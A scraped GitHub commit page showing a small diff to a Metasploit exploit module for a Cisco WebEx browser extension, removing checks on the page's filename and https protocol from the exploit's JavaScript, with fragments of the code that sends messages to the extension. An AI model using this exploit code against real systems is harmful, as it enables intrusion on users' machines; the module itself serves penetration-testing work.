We read every piece of feedback, and take your input very seriously.
To see all available qualifiers, see our documentation.
There was an error while loading. Please reload this page.
1 parent d2bc8c7 commit ad0e2c7Copy full SHA for ad0e2c7
modules/exploits/windows/misc/cisco_webex_ext.rb
@@ -75,16 +75,6 @@ def exploit_html(cli, req_uri)
75
76
function runcode()
77
{
78
- if (!document.location.pathname.endsWith("cwcsf-nativemsg-iframe-43c85c0d-d633-af5e-c056-32dc7efc570b.html")) {
79
- alert("document /must/ be named cwcsf-nativemsg-iframe-43c85c0d-d633-af5e-c056-32dc7efc570b.html");
80
- return;
81
- }
82
-
83
- if (!document.location.protocol.endsWith("https:")) {
84
- alert("document /must/ be served over https");
85
86
87
88
document.dispatchEvent(new CustomEvent("connect", { detail: { token: "token" }}));
89
document.dispatchEvent(new CustomEvent("message", { detail: {
90
message: JSON.stringify(msg),
0 commit comments